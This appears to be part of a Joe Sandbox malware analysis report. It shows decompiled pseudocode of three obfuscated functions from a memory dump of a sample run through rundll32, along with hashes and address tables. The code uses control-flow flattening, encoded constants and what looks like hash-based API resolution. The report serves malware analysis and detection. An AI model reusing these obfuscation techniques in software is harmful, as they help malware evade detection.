                                                                                                                    0x003400f9
                                                                                                                    0x00340109
                                                                                                                    0x0034010d
                                                                                                                    0x00340115
                                                                                                                    0x0034011d
                                                                                                                    0x00340129
                                                                                                                    0x0034012e
                                                                                                                    0x00340134
                                                                                                                    0x0034013c
                                                                                                                    0x00340144
                                                                                                                    0x0034014c
                                                                                                                    0x00340151
                                                                                                                    0x00340159
                                                                                                                    0x00340166
                                                                                                                    0x00340167
                                                                                                                    0x0034016b
                                                                                                                    0x00340173
                                                                                                                    0x0034017b
                                                                                                                    0x00340189
                                                                                                                    0x0034018d
                                                                                                                    0x00340195
                                                                                                                    0x0034019f
                                                                                                                    0x003401ad
                                                                                                                    0x003401b2
                                                                                                                    0x003401c1
                                                                                                                    0x003401c6
                                                                                                                    0x003401d5
                                                                                                                    0x003401d8
                                                                                                                    0x003401dc
                                                                                                                    0x003401e4
                                                                                                                    0x003401f1
                                                                                                                    0x003401f5
                                                                                                                    0x003401fd
                                                                                                                    0x00340205
                                                                                                                    0x0034020d
                                                                                                                    0x00340212
                                                                                                                    0x0034021a
                                                                                                                    0x00340227
                                                                                                                    0x0034022b
                                                                                                                    0x00340233
                                                                                                                    0x0034023d
                                                                                                                    0x00340280
                                                                                                                    0x00340285
                                                                                                                    0x00340289
                                                                                                                    0x0034028b
                                                                                                                    0x0034028d
                                                                                                                    0x0034028f
                                                                                                                    0x00340295
                                                                                                                    0x00340295
                                                                                                                    0x00340297
                                                                                                                    0x0034029d
                                                                                                                    0x0034029d
                                                                                                                    0x0034029f
                                                                                                                    0x003402a5
                                                                                                                    0x003402a5
                                                                                                                    0x003402a1
                                                                                                                    0x003402a1
                                                                                                                    0x003402a3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003402a3
                                                                                                                    0x00340299
                                                                                                                    0x00340299
                                                                                                                    0x0034029b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0034029b
                                                                                                                    0x00340291
                                                                                                                    0x00340291
                                                                                                                    0x00340293
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00340293
                                                                                                                    0x003402a8
                                                                                                                    0x003402a9
                                                                                                                    0x003402a9
                                                                                                                    0x003402ae
                                                                                                                    0x00000000
                                                                                                                    0x0034023f
                                                                                                                    0x00340241
                                                                                                                    0x00340257
                                                                                                                    0x00340271
                                                                                                                    0x00340276
                                                                                                                    0x00340279
                                                                                                                    0x00000000
                                                                                                                    0x00340243
                                                                                                                    0x00340249
                                                                                                                    0x0034024f
                                                                                                                    0x00000000
                                                                                                                    0x0034024f
                                                                                                                    0x00340249
                                                                                                                    0x00340241
                                                                                                                    0x0034030f
                                                                                                                    0x0034030f
                                                                                                                    0x00340315
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00340325
                                                                                                                    0x00340325
                                                                                                                    0x003402b2
                                                                                                                    0x003402bb
                                                                                                                    0x003402bf
                                                                                                                    0x003402c7
                                                                                                                    0x003402f3
                                                                                                                    0x00340302
                                                                                                                    0x00340307
                                                                                                                    0x0034030a
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: *&B$YX.$eP)s$iFG${So
                                                                                                                    • API String ID: 0-3810143839
                                                                                                                    • Opcode ID: 0d0154b57350d9985deca02ba2f228b16e2a84d19a59fc2fad7a71d4439b6709
                                                                                                                    • Instruction ID: 508258e7ffd7325edfa96ca76a486022b6c7ecf41552f548bc214b207c7bdd0c
                                                                                                                    • Opcode Fuzzy Hash: 0d0154b57350d9985deca02ba2f228b16e2a84d19a59fc2fad7a71d4439b6709
                                                                                                                    • Instruction Fuzzy Hash: 6A81A7716093419BD3A8CF25D589A1BBBE2FBC5718F00591DF2C59A2A0D3B8D949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00337735 Relevance: 6.4, Strings: 5, Instructions: 191COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E00337735(void* __edx, intOrPtr _a4, signed int* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				void* _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				unsigned int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void* __ecx;
				void* _t163;
				signed int _t176;
				void* _t188;
				signed int _t205;
				signed int* _t207;
				void* _t209;
				void* _t210;

				_t186 = _a4;
				_t207 = _a8;
				_push(_a16);
				_push(_a12);
				_push(_t207);
				_push(_a4);
				_push(__edx);
				E003420B9(_t163);
				_v60 = 0x524796;
				_t210 = _t209 + 0x18;
				asm("stosd");
				_t188 = 0x9c25eae;
				asm("stosd");
				asm("stosd");
				_v76 = 0x29f01;
				_v76 = _v76 | 0x94be009d;
				_v76 = _v76 ^ 0x94be9f9d;
				_v108 = 0xafa956;
				_v108 = _v108 + 0x628;
				_v108 = _v108 ^ 0xf539d3de;
				_v108 = _v108 ^ 0xf5927b2e;
				_v92 = 0x300c11;
				_v92 = _v92 ^ 0x95f7d427;
				_v92 = _v92 ^ 0x95c19bc8;
				_v116 = 0x7fd72e;
				_v116 = _v116 >> 0x10;
				_v116 = _v116 + 0x5d9b;
				_v116 = _v116 ^ 0x0001fda4;
				_v88 = 0x25a82f;
				_t205 = 0x1b;
				_v88 = _v88 * 0x72;
				_v88 = _v88 ^ 0x10cad58f;
				_v100 = 0xf91ce5;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0x71d91e41;
				_v100 = _v100 ^ 0x71d9c87d;
				_v136 = 0x5a524;
				_v136 = _v136 ^ 0x65d544fc;
				_v136 = _v136 / _t205;
				_v136 = _v136 + 0xdad4;
				_v136 = _v136 ^ 0x03c43220;
				_v68 = 0xd5537a;
				_v68 = _v68 + 0xffffd52f;
				_v68 = _v68 ^ 0x00d2b66c;
				_v128 = 0x59397b;
				_v128 = _v128 ^ 0x5dfc0cc3;
				_v128 = _v128 + 0x56f6;
				_v128 = _v128 + 0xff83;
				_v128 = _v128 ^ 0x5dafd3d4;
				_v104 = 0x85edfa;
				_v104 = _v104 | 0x32b3baf7;
				_v104 = _v104 ^ 0x32b12396;
				_v112 = 0x4c4fc6;
				_v112 = _v112 + 0xbf9f;
				_v112 = _v112 >> 1;
				_v112 = _v112 ^ 0x002f2047;
				_v120 = 0xc21a43;
				_v120 = _v120 | 0x0781619f;
				_v120 = _v120 ^ 0x30a197e6;
				_v120 = _v120 ^ 0x376a3e6d;
				_v84 = 0xaf6a80;
				_v84 = _v84 + 0xffff12f3;
				_v84 = _v84 ^ 0x00ae6f5f;
				_v64 = 0x7bdfb0;
				_v64 = _v64 >> 2;
				_v64 = _v64 ^ 0x00114c08;
				_v96 = 0x6b35de;
				_v96 = _v96 * 0x60;
				_v96 = _v96 ^ 0x283b6418;
				_v124 = 0x52b9d2;
				_v124 = _v124 | 0x40c5122c;
				_v124 = _v124 << 8;
				_v124 = _v124 >> 0x10;
				_v124 = _v124 ^ 0x0001910d;
				_v132 = 0x44d0f9;
				_v132 = _v132 * 0x29;
				_v132 = _v132 + 0xf17;
				_v132 = _v132 * 0x65;
				_v132 = _v132 ^ 0x592f3fb2;
				_v72 = 0xc75ad6;
				_v72 = _v72 ^ 0xe0bef3a1;
				_v72 = _v72 ^ 0xe072572c;
				_v80 = 0xa6c1d6;
				_v80 = _v80 + 0xc8d;
				_v80 = _v80 ^ 0x00ac29a9;
				do {
					while(_t188 != 0xe27b71) {
						if(_t188 == 0x372e88b) {
							_push(_t188);
							_push(_t188);
							_t176 = E00337FF2(_t207[1]);
							 *_t207 = _t176;
							__eflags = _t176;
							if(__eflags != 0) {
								_t188 = 0xe27b71;
								continue;
							}
						} else {
							if(_t188 == 0x93f98fe) {
								_t207[1] = E00350C14(_t186);
								_t188 = 0x372e88b;
								continue;
							} else {
								if(_t188 == 0x9c25eae) {
									_t188 = 0x93f98fe;
									 *_t207 =  *_t207 & 0x00000000;
									_t207[1] = _v76;
									continue;
								} else {
									if(_t188 == 0xa0c9f29) {
										_t146 =  &_v112; // 0x2f2047
										E00340DAF(_v68,  &_v44, _v128,  *((intOrPtr*)(_t186 + 0x48)), _v104,  *_t146);
										_t210 = _t210 + 0x10;
										_t188 = 0xc7f60b3;
										continue;
									} else {
										if(_t188 == 0xc7f60b3) {
											_t144 =  &_v84; // 0xe072572c
											E00350E3A( &_v44, _v120, __eflags,  *_t144, _v64, _v96, _t186 + 0x14);
											_t210 = _t210 + 0x10;
											_t188 = 0xcf8cba1;
											continue;
										} else {
											_t219 = _t188 - 0xcf8cba1;
											if(_t188 != 0xcf8cba1) {
												goto L17;
											} else {
												E00350E3A( &_v44, _v124, _t219, _v132, _v72, _v80, _t186 + 0x38);
											}
										}
									}
								}
							}
						}
						L9:
						return 0 |  *_t207 != 0x00000000;
					}
					E00333DBC( &_v44, _t207, _v88, _v100, _v136);
					_t210 = _t210 + 0xc;
					_t188 = 0xa0c9f29;
					L17:
					__eflags = _t188 - 0x560a718;
				} while (__eflags != 0);
				goto L9;
			}

































                                                                                                                    0x0033773c
                                                                                                                    0x00337745
                                                                                                                    0x0033774d
                                                                                                                    0x00337754
                                                                                                                    0x0033775b
                                                                                                                    0x0033775c
                                                                                                                    0x0033775d
                                                                                                                    0x0033775f
                                                                                                                    0x00337764
                                                                                                                    0x00337772
                                                                                                                    0x00337775
                                                                                                                    0x00337778
                                                                                                                    0x0033777f
                                                                                                                    0x00337780
                                                                                                                    0x00337781
                                                                                                                    0x00337789
                                                                                                                    0x00337791
                                                                                                                    0x00337799
                                                                                                                    0x003377a1
                                                                                                                    0x003377a9
                                                                                                                    0x003377b1
                                                                                                                    0x003377b9
                                                                                                                    0x003377c1
                                                                                                                    0x003377c9
                                                                                                                    0x003377d1
                                                                                                                    0x003377d9
                                                                                                                    0x003377de
                                                                                                                    0x003377e6
                                                                                                                    0x003377ee
                                                                                                                    0x003377fb
                                                                                                                    0x003377fc
                                                                                                                    0x00337800
                                                                                                                    0x00337808
                                                                                                                    0x00337810
                                                                                                                    0x00337815
                                                                                                                    0x0033781d
                                                                                                                    0x00337825
                                                                                                                    0x0033782d
                                                                                                                    0x0033783b
                                                                                                                    0x0033783f
                                                                                                                    0x00337847
                                                                                                                    0x0033784f
                                                                                                                    0x00337857
                                                                                                                    0x0033785f
                                                                                                                    0x00337867
                                                                                                                    0x0033786f
                                                                                                                    0x00337877
                                                                                                                    0x0033787f
                                                                                                                    0x00337887
                                                                                                                    0x0033788f
                                                                                                                    0x00337897
                                                                                                                    0x0033789f
                                                                                                                    0x003378a7
                                                                                                                    0x003378af
                                                                                                                    0x003378b7
                                                                                                                    0x003378bb
                                                                                                                    0x003378c3
                                                                                                                    0x003378cb
                                                                                                                    0x003378d3
                                                                                                                    0x003378db
                                                                                                                    0x003378e3
                                                                                                                    0x003378eb
                                                                                                                    0x003378f3
                                                                                                                    0x003378fb
                                                                                                                    0x00337903
                                                                                                                    0x00337908
                                                                                                                    0x00337910
                                                                                                                    0x0033791d
                                                                                                                    0x00337921
                                                                                                                    0x0033792e
                                                                                                                    0x0033793b
                                                                                                                    0x00337943
                                                                                                                    0x00337948
                                                                                                                    0x0033794d
                                                                                                                    0x00337955
                                                                                                                    0x00337962
                                                                                                                    0x00337966
                                                                                                                    0x00337973
                                                                                                                    0x00337977
                                                                                                                    0x0033797f
                                                                                                                    0x00337987
                                                                                                                    0x0033798f
                                                                                                                    0x00337997
                                                                                                                    0x0033799f
                                                                                                                    0x003379a7
                                                                                                                    0x003379af
                                                                                                                    0x003379af
                                                                                                                    0x003379bd
                                                                                                                    0x00337aac
                                                                                                                    0x00337aad
                                                                                                                    0x00337aae
                                                                                                                    0x00337ab3
                                                                                                                    0x00337ab7
                                                                                                                    0x00337ab9
                                                                                                                    0x00337abf
                                                                                                                    0x00000000
                                                                                                                    0x00337abf
                                                                                                                    0x003379c3
                                                                                                                    0x003379c5
                                                                                                                    0x00337a90
                                                                                                                    0x00337a93
                                                                                                                    0x00000000
                                                                                                                    0x003379cb
                                                                                                                    0x003379d1
                                                                                                                    0x00337a7c
                                                                                                                    0x00337a7e
                                                                                                                    0x00337a81
                                                                                                                    0x00000000
                                                                                                                    0x003379d7
                                                                                                                    0x003379dd
                                                                                                                    0x00337a4f
                                                                                                                    0x00337a66
                                                                                                                    0x00337a6b
                                                                                                                    0x00337a6e
                                                                                                                    0x00000000
                                                                                                                    0x003379df
                                                                                                                    0x003379e5
                                                                                                                    0x00337a35
                                                                                                                    0x00337a3d
                                                                                                                    0x00337a42
                                                                                                                    0x00337a45
                                                                                                                    0x00000000
                                                                                                                    0x003379e7
                                                                                                                    0x003379e7
                                                                                                                    0x003379ed
                                                                                                                    0x00000000
                                                                                                                    0x003379f3
                                                                                                                    0x00337a0b
                                                                                                                    0x00337a10
                                                                                                                    0x003379ed
                                                                                                                    0x003379e5
                                                                                                                    0x003379dd
                                                                                                                    0x003379d1
                                                                                                                    0x003379c5
                                                                                                                    0x00337a13
                                                                                                                    0x00337a24
                                                                                                                    0x00337a24
                                                                                                                    0x00337ad8
                                                                                                                    0x00337add
                                                                                                                    0x00337ae0
                                                                                                                    0x00337ae5
                                                                                                                    0x00337ae5
                                                                                                                    0x00337ae5
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ,Wr$G /$m>j7$q{${9Y
                                                                                                                    • API String ID: 0-2956538602
                                                                                                                    • Opcode ID: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                    • Instruction ID: 7eb449475dc396b7c1375fdc4b9a4d8532ea4b3ef40b1c2033354532d2356c48
                                                                                                                    • Opcode Fuzzy Hash: aad4c5470bf923e8e08ddaad0ee87e401980107f56092e5079a3be882124f178
                                                                                                                    • Instruction Fuzzy Hash: F0912EB11093419FD7A9CF65D58692BBBE1FBC4748F109A1CF29296220D3B5CA498F43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00334816 Relevance: 6.4, Strings: 5, Instructions: 180COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E00334816(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t164;
				void* _t179;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t196;
				void* _t213;
				void* _t214;
				signed int* _t217;

				_push(_a16);
				_t213 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t164);
				_v4 = _v4 & 0x00000000;
				_t217 =  &(( &_v88)[6]);
				_v16 = 0xc0a747;
				_v12 = 0xade381;
				_t214 = 0;
				_v8 = 0x11050f;
				_t196 = 0x5adc597;
				_v84 = 0xdf9e69;
				_v84 = _v84 >> 2;
				_v84 = _v84 + 0xffff5795;
				_v84 = _v84 >> 5;
				_v84 = _v84 ^ 0x0001b9f8;
				_v68 = 0xf2d8cd;
				_v68 = _v68 << 6;
				_v68 = _v68 | 0xe3b79c6a;
				_v68 = _v68 + 0xec5a;
				_v68 = _v68 ^ 0xffb8abc5;
				_v40 = 0x5d8c34;
				_v40 = _v40 >> 9;
				_v40 = _v40 ^ 0x40002ec6;
				_v28 = 0x37ca39;
				_v28 = _v28 | 0x456668c2;
				_v28 = _v28 ^ 0x0577eafb;
				_v80 = 0xd16358;
				_v80 = _v80 ^ 0xe637ce9d;
				_t190 = 0x68;
				_v80 = _v80 * 0x4b;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0x965c2e63;
				_v56 = 0xfc1806;
				_v56 = _v56 + 0xffffb57d;
				_v56 = _v56 | 0x299c1b97;
				_v56 = _v56 ^ 0x29fc2736;
				_v44 = 0x81586;
				_v44 = _v44 | 0xba5390c4;
				_v44 = _v44 ^ 0xba584850;
				_v60 = 0x52e6aa;
				_v60 = _v60 >> 0xa;
				_v60 = _v60 * 0x28;
				_v60 = _v60 ^ 0x00066c4e;
				_v48 = 0x7a334;
				_v48 = _v48 + 0xfffff5af;
				_v48 = _v48 ^ 0x0009652d;
				_v52 = 0x3bf8e8;
				_v52 = _v52 / _t190;
				_v52 = _v52 ^ 0x00025bcb;
				_v64 = 0xacc490;
				_t191 = 0x6f;
				_v64 = _v64 / _t191;
				_v64 = _v64 ^ 0xce7acdce;
				_v64 = _v64 ^ 0xce756fa5;
				_v88 = 0x557b83;
				_v88 = _v88 ^ 0xfc4fd146;
				_v88 = _v88 ^ 0x87bb4e9a;
				_v88 = _v88 ^ 0x18fbc6ce;
				_v88 = _v88 ^ 0x635c68ef;
				_v24 = 0xa24557;
				_t192 = 0x23;
				_v24 = _v24 / _t192;
				_v24 = _v24 ^ 0x00019ec3;
				_v72 = 0x274d3f;
				_v72 = _v72 + 0x3236;
				_v72 = _v72 + 0x71a1;
				_v72 = _v72 + 0x1749;
				_v72 = _v72 ^ 0x0028bc49;
				_v32 = 0x96c762;
				_t193 = 0x44;
				_v32 = _v32 / _t193;
				_v32 = _v32 ^ 0x000b5918;
				_v76 = 0x2f082c;
				_v76 = _v76 + 0x52f3;
				_v76 = _v76 + 0x7ae4;
				_v76 = _v76 ^ 0x81d2744f;
				_v76 = _v76 ^ 0x81f68fa5;
				_v36 = 0x9357ce;
				_v36 = _v36 + 0xfffffb26;
				_v36 = _v36 ^ 0x009b03e6;
				do {
					while(_t196 != 0x4d42949) {
						if(_t196 == 0x5adc597) {
							_t196 = 0x4d42949;
							continue;
						} else {
							if(_t196 == 0x78e32ab) {
								E0034847F(_v24, _t213, _v28 | _v68, _v72, _a8, _v32, _t214, _v76, _v36,  &_v20);
							} else {
								if(_t196 != 0xf2775cd) {
									goto L11;
								} else {
									_push(_t196);
									_push(_t196);
									_t214 = E00337FF2(_v20 + _v20);
									if(_t214 != 0) {
										_t196 = 0x78e32ab;
										continue;
									}
								}
							}
						}
						L14:
						return _t214;
					}
					_t179 = E0034847F(_v80, _t213, _v40 | _v84, _v56, _a8, _v44, 0, _v60, _v48,  &_v20);
					_t217 =  &(_t217[8]);
					if(_t179 == 0) {
						_t196 = 0xc32537b;
						goto L11;
					} else {
						_t196 = 0xf2775cd;
						continue;
					}
					goto L14;
					L11:
				} while (_t196 != 0xc32537b);
				goto L14;
			}



































                                                                                                                    0x0033481d
                                                                                                                    0x00334821
                                                                                                                    0x00334823
                                                                                                                    0x00334827
                                                                                                                    0x0033482b
                                                                                                                    0x0033482f
                                                                                                                    0x00334830
                                                                                                                    0x00334831
                                                                                                                    0x00334836
                                                                                                                    0x0033483b
                                                                                                                    0x0033483e
                                                                                                                    0x00334848
                                                                                                                    0x00334850
                                                                                                                    0x00334852
                                                                                                                    0x0033485a
                                                                                                                    0x0033485f
                                                                                                                    0x00334867
                                                                                                                    0x0033486c
                                                                                                                    0x00334874
                                                                                                                    0x00334879
                                                                                                                    0x00334881
                                                                                                                    0x00334889
                                                                                                                    0x0033488e
                                                                                                                    0x00334896
                                                                                                                    0x0033489e
                                                                                                                    0x003348a6
                                                                                                                    0x003348ae
                                                                                                                    0x003348b3
                                                                                                                    0x003348bb
                                                                                                                    0x003348c3
                                                                                                                    0x003348cb
                                                                                                                    0x003348d3
                                                                                                                    0x003348db
                                                                                                                    0x003348ea
                                                                                                                    0x003348ed
                                                                                                                    0x003348f1
                                                                                                                    0x003348f6
                                                                                                                    0x003348fe
                                                                                                                    0x00334906
                                                                                                                    0x0033490e
                                                                                                                    0x00334916
                                                                                                                    0x0033491e
                                                                                                                    0x00334926
                                                                                                                    0x0033492e
                                                                                                                    0x00334936
                                                                                                                    0x0033493e
                                                                                                                    0x00334948
                                                                                                                    0x0033494c
                                                                                                                    0x00334954
                                                                                                                    0x0033495c
                                                                                                                    0x00334964
                                                                                                                    0x0033496c
                                                                                                                    0x0033497c
                                                                                                                    0x00334980
                                                                                                                    0x00334988
                                                                                                                    0x00334994
                                                                                                                    0x00334997
                                                                                                                    0x0033499b
                                                                                                                    0x003349a3
                                                                                                                    0x003349ab
                                                                                                                    0x003349b3
                                                                                                                    0x003349bb
                                                                                                                    0x003349c3
                                                                                                                    0x003349cb
                                                                                                                    0x003349d5
                                                                                                                    0x003349e3
                                                                                                                    0x003349e8
                                                                                                                    0x003349ee
                                                                                                                    0x003349fb
                                                                                                                    0x00334a03
                                                                                                                    0x00334a0b
                                                                                                                    0x00334a13
                                                                                                                    0x00334a1b
                                                                                                                    0x00334a23
                                                                                                                    0x00334a2f
                                                                                                                    0x00334a37
                                                                                                                    0x00334a3b
                                                                                                                    0x00334a43
                                                                                                                    0x00334a4b
                                                                                                                    0x00334a53
                                                                                                                    0x00334a5b
                                                                                                                    0x00334a63
                                                                                                                    0x00334a6b
                                                                                                                    0x00334a73
                                                                                                                    0x00334a7b
                                                                                                                    0x00334a83
                                                                                                                    0x00334a83
                                                                                                                    0x00334a8d
                                                                                                                    0x00334ac9
                                                                                                                    0x00000000
                                                                                                                    0x00334a8f
                                                                                                                    0x00334a91
                                                                                                                    0x00334b4f
                                                                                                                    0x00334a97
                                                                                                                    0x00334a9d
                                                                                                                    0x00000000
                                                                                                                    0x00334a9f
                                                                                                                    0x00334aaf
                                                                                                                    0x00334ab0
                                                                                                                    0x00334ab9
                                                                                                                    0x00334abf
                                                                                                                    0x00334ac5
                                                                                                                    0x00000000
                                                                                                                    0x00334ac5
                                                                                                                    0x00334abf
                                                                                                                    0x00334a9d
                                                                                                                    0x00334a91
                                                                                                                    0x00334b58
                                                                                                                    0x00334b60
                                                                                                                    0x00334b60
                                                                                                                    0x00334afa
                                                                                                                    0x00334aff
                                                                                                                    0x00334b04
                                                                                                                    0x00334b10
                                                                                                                    0x00000000
                                                                                                                    0x00334b06
                                                                                                                    0x00334b06
                                                                                                                    0x00000000
                                                                                                                    0x00334b06
                                                                                                                    0x00000000
                                                                                                                    0x00334b15
                                                                                                                    0x00334b15
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: -e$62$?M'$h\c$z
                                                                                                                    • API String ID: 0-1842174784
                                                                                                                    • Opcode ID: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                    • Instruction ID: 028ef9239f9a6d87590fe09684fffa14b4bbb6a64c2b1cdb99ea84b23aed769d
                                                                                                                    • Opcode Fuzzy Hash: 3bb5ab6fe4e144f6f9fa152f4c768ba037a2635da891751e18d7284d158d406f
                                                                                                                    • Instruction Fuzzy Hash: F3812F715093819FD3A8CF65C58991FBBF5FBC9758F408A0CF2958A260D3B6DA088F42
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034BE27 Relevance: 6.4, Strings: 5, Instructions: 130COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E0034BE27(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v320;
				char _t133;
				signed int _t136;
				void* _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				char* _t144;
				intOrPtr* _t163;
				void* _t164;

				_v40 = 0x365269;
				_v40 = _v40 >> 7;
				_v40 = _v40 ^ 0x00099806;
				_v16 = 0x620947;
				_v16 = _v16 + 0x25da;
				_v16 = _v16 | 0xf0dff1a3;
				_v16 = _v16 + 0xffff8fd5;
				_v16 = _v16 ^ 0xf0f65193;
				_v60 = 0x4a6911;
				_v60 = _v60 >> 2;
				_v60 = _v60 ^ 0x0015bfec;
				_v32 = 0xee641f;
				_v32 = _v32 ^ 0x54466854;
				_v32 = _v32 ^ 0x51df3278;
				_v32 = _v32 ^ 0x057124b2;
				_v36 = 0x2245a1;
				_t163 = __ecx;
				_t141 = 0x59;
				_v36 = _v36 / _t141;
				_t142 = 0x7c;
				_v36 = _v36 / _t142;
				_v36 = _v36 ^ 0x00022b59;
				_v52 = 0x17e728;
				_v52 = _v52 << 7;
				_v52 = _v52 ^ 0x0bfefc33;
				_v24 = 0x5a7c12;
				_v24 = _v24 + 0xffff6a30;
				_v24 = _v24 + 0xb9bd;
				_v24 = _v24 ^ 0x00522d4c;
				_v8 = 0x70b293;
				_v8 = _v8 ^ 0xb7f64013;
				_v8 = _v8 | 0x98950303;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0xf38d6f21;
				_v28 = 0x5e48e6;
				_v28 = _v28 >> 2;
				_v28 = _v28 << 0xf;
				_v28 = _v28 ^ 0xc917f664;
				_v44 = 0xd34be4;
				_v44 = _v44 ^ 0x1af04c78;
				_v44 = _v44 ^ 0x1a25cf5b;
				_v56 = 0x13a2c8;
				_v56 = _v56 ^ 0x00107e6c;
				_v20 = 0x6acc1;
				_t143 = 0x48;
				_v20 = _v20 * 0x75;
				_v20 = _v20 | 0x5ce04716;
				_v20 = _v20 ^ 0xfe39b07b;
				_v20 = _v20 ^ 0xa1d6ae77;
				_v48 = 0x9d30cb;
				_t144 =  &_v320;
				_v48 = _v48 / _t143;
				_v48 = _v48 ^ 0x00028c5d;
				_v12 = 0x456efe;
				_v12 = _v12 + 0xffff4082;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0xdbb5e427;
				_v12 = _v12 ^ 0xdb99f5c8;
				while(1) {
					_t133 =  *_t163;
					if(_t133 == 0) {
						break;
					}
					if(_t133 == 0x2e) {
						 *_t144 = 0;
					} else {
						 *_t144 = _t133;
						_t144 = _t144 + 1;
						_t163 = _t163 + 1;
						continue;
					}
					L6:
					_t164 = E0033ADE6(_v40, _v16,  &_v320, _v60);
					if(_t164 != 0) {
						L8:
						_t136 = E0034DBEA(_t163 + 1, _v8, _v28, _v44);
						_push(_v12);
						_push(_t136 ^ 0x2ac2611c);
						_push(_v48);
						_push(_t164);
						return E0033CDCD(_v56, _v20);
					}
					_t139 = E0034CADF(_v32,  &_v320, _v36, _v52);
					_t164 = _t139;
					if(_t164 != 0) {
						goto L8;
					}
					return _t139;
				}
				goto L6;
			}



























                                                                                                                    0x0034be30
                                                                                                                    0x0034be39
                                                                                                                    0x0034be3d
                                                                                                                    0x0034be44
                                                                                                                    0x0034be4b
                                                                                                                    0x0034be52
                                                                                                                    0x0034be59
                                                                                                                    0x0034be60
                                                                                                                    0x0034be67
                                                                                                                    0x0034be6e
                                                                                                                    0x0034be72
                                                                                                                    0x0034be79
                                                                                                                    0x0034be80
                                                                                                                    0x0034be87
                                                                                                                    0x0034be8e
                                                                                                                    0x0034be95
                                                                                                                    0x0034bea3
                                                                                                                    0x0034bea5
                                                                                                                    0x0034beaa
                                                                                                                    0x0034beb2
                                                                                                                    0x0034beb7
                                                                                                                    0x0034bebc
                                                                                                                    0x0034bec3
                                                                                                                    0x0034beca
                                                                                                                    0x0034bece
                                                                                                                    0x0034bed5
                                                                                                                    0x0034bedc
                                                                                                                    0x0034bee3
                                                                                                                    0x0034beea
                                                                                                                    0x0034bef1
                                                                                                                    0x0034bef8
                                                                                                                    0x0034beff
                                                                                                                    0x0034bf06
                                                                                                                    0x0034bf0a
